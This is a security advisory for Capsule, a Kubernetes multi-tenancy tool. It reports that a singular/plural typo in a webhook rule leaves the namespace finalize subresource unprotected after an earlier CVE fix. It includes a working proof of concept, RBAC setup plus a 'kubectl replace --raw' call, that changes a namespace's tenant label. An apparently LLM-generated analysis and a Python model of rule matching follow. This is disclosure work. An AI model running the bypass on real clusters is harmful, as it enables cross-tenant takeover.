Capsule: Incomplete fix of CVE-2026-30963: singular/plural typo leaves namespaces/finalize unprotected
Description
Summary
The CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but charts/capsule/templates/configuration.yaml line 105 contains a singular/plural typo: namespace/finalize instead of namespaces/finalize. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.
Details
In Kubernetes admission webhooks, rules.resources matches against the plural resource name. A PUT to /api/v1/namespaces//finalize has resource=namespaces (plural). The rule namespace/finalize (singular) never matches any real API request.
The matchPolicy: Equivalent setting does NOT compensate (it handles API group/version variations, not resource name typos).
PoC
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart):

```bash
# Setup: alice with namespaces/finalize RBAC
# (the ClusterRole/ClusterRoleBinding object names are assumed; the advisory
# only states the rules they carry)
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ns-finalizer
rules:
- apiGroups: [""]
  resources: ["namespaces/finalize"]
  verbs: ["update"]
- apiGroups: [""]
  resources: ["namespaces"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: alice-ns-finalizer
subjects:
- kind: User
  name: alice
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: ns-finalizer
  apiGroup: rbac.authorization.k8s.io
EOF

# Control: a direct label change on the namespace is DENIED by the Capsule webhook
kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice

# Bypass: the same change sent through the finalize subresource
kubectl get namespace oil-prod -o json > /tmp/ns.json
# modify tenant label to "hijacked" (saved as /tmp/ns_modified.json)
kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice
# 200 OK - tenant label changed
```
Impact
Namespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: namespace/finalize -> namespaces/finalize.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability mechanics
Root cause
"Singular/plural typo in webhook rule: `namespace/finalize` instead of `namespaces/finalize` causes the finalize subresource admission check to never match any real API request."
Attack vector
An attacker who has RBAC permissions to update the `namespaces/finalize` subresource (but not to directly label namespaces) can bypass the Capsule admission webhook. A PUT request to `/api/v1/namespaces/<ns>/finalize` uses the plural resource `namespaces`, but the webhook rule mistakenly lists the singular `namespace/finalize`, so the webhook is never invoked [ref_id=1]. The `matchPolicy: Equivalent` setting does not compensate because it only handles API group/version variations, not resource name typos [ref_id=1]. The attacker can modify the tenant label on a namespace via the finalize endpoint, achieving the same tenant-label hijack that CVE-2026-30963 was meant to prevent [ref_id=1].
Affected code
The vulnerability is in `charts/capsule/templates/configuration.yaml` at line 105, where the webhook rule lists `namespace/finalize` (singular) instead of `namespaces/finalize` (plural) [ref_id=1]. This rule is part of the namespace validating webhook's subresource entries added by the CVE-2026-30963 fix [ref_id=1]. No patch file is provided in the bundle; the advisory identifies this single line as the defect.
What the fix does
No patch diff is included in the bundle. The advisory states the fix is a one-character change: replace `namespace/finalize` with `namespaces/finalize` in `charts/capsule/templates/configuration.yaml` line 105 [ref_id=1]. This corrects the webhook rule to match the plural resource name that Kubernetes uses for the finalize subresource, restoring the admission webhook defense that was intended by the CVE-2026-30963 fix [ref_id=1].
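To make the matching behaviour described in Details and in the fix concrete, the following added example (not code from the advisory or from Capsule) models the resource/subresource part of the kube-apiserver's webhook rule matcher and checks the shipped rule and the corrected rule against the finalize PUT. It also includes a small audit helper that flags rule entries whose resource part is not a plural name the cluster serves; the set of known plurals is a constructed stand-in for `kubectl api-resources` output.

```python
"""Simplified model of kube-apiserver admission webhook rule matching.

Only the parts relevant to this advisory are modelled: group/version/operation
are exact-or-wildcard, and each `resources` entry is "<plural>[/<subresource>]".
matchPolicy: Equivalent is not modelled because it only rewrites the request's
group/version to one the rule lists; the resource name is never rewritten.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Attrs:
    """Request attributes the apiserver derives from the URL and verb."""
    group: str
    version: str
    resource: str     # always the plural name, e.g. "namespaces"
    subresource: str  # "" for the main resource, e.g. "finalize"
    operation: str    # CREATE / UPDATE / DELETE / CONNECT


def rule_matches(rule: dict, a: Attrs) -> bool:
    """True if one rule selects the request; "*" alone does not cover subresources."""
    if not any(g in ("*", a.group) for g in rule["apiGroups"]):
        return False
    if not any(v in ("*", a.version) for v in rule["apiVersions"]):
        return False
    if not any(o in ("*", a.operation) for o in rule["operations"]):
        return False
    for entry in rule["resources"]:
        resource, _, subresource = entry.partition("/")
        if resource in ("*", a.resource) and subresource in ("*", a.subresource):
            return True
    return False


def webhook_invoked(rules: list, a: Attrs) -> bool:
    return any(rule_matches(r, a) for r in rules)


def find_unknown_resources(rules: list, known_plurals: set) -> list:
    """Audit helper: rule entries whose resource part is not a served plural name."""
    return [e for r in rules for e in r["resources"]
            if e.partition("/")[0] not in known_plurals | {"*"}]


# PUT /api/v1/namespaces/oil-prod/finalize as the apiserver sees it
FINALIZE_PUT = Attrs("", "v1", "namespaces", "finalize", "UPDATE")
# kubectl label on the namespace itself (the control test)
LABEL_UPDATE = Attrs("", "v1", "namespaces", "", "UPDATE")

# Rule as shipped in Capsule v0.13.2 (singular typo) and the one-character fix
VULNERABLE_RULE = {"apiGroups": [""], "apiVersions": ["v1"], "operations": ["UPDATE"],
                   "resources": ["namespaces", "namespace/finalize"]}
FIXED_RULE = {**VULNERABLE_RULE, "resources": ["namespaces", "namespaces/finalize"]}
```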
Preconditions
- auth: Attacker must have RBAC permissions to update the `namespaces/finalize` subresource (e.g., via a ClusterRole with `resources: ["namespaces/finalize"]` and `verbs: ["update"]`)
- config: Capsule v0.13.2 must be deployed with the Helm chart containing the singular/plural typo in the webhook configuration
- network: Attacker must have network access to the Kubernetes API server
- input: Attacker must supply a modified namespace JSON with a changed tenant label via the finalize endpoint
Reproduction
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart) [ref_id=1]. Setup: create a user `alice` with a ClusterRole granting `resources: ["namespaces/finalize"]` with `verbs: ["update"]` and `resources: ["namespaces"]` with `verbs: ["get", "list"]`, then bind via ClusterRoleBinding [ref_id=1]. Control test: `kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice` is denied by the webhook [ref_id=1]. Bypass: `kubectl get namespace oil-prod -o json > /tmp/ns.json`, modify the tenant label to "hijacked", then `kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice` returns 200 OK and the tenant label is changed without the webhook being invoked [ref_id=1].
Generated on Jun 17, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.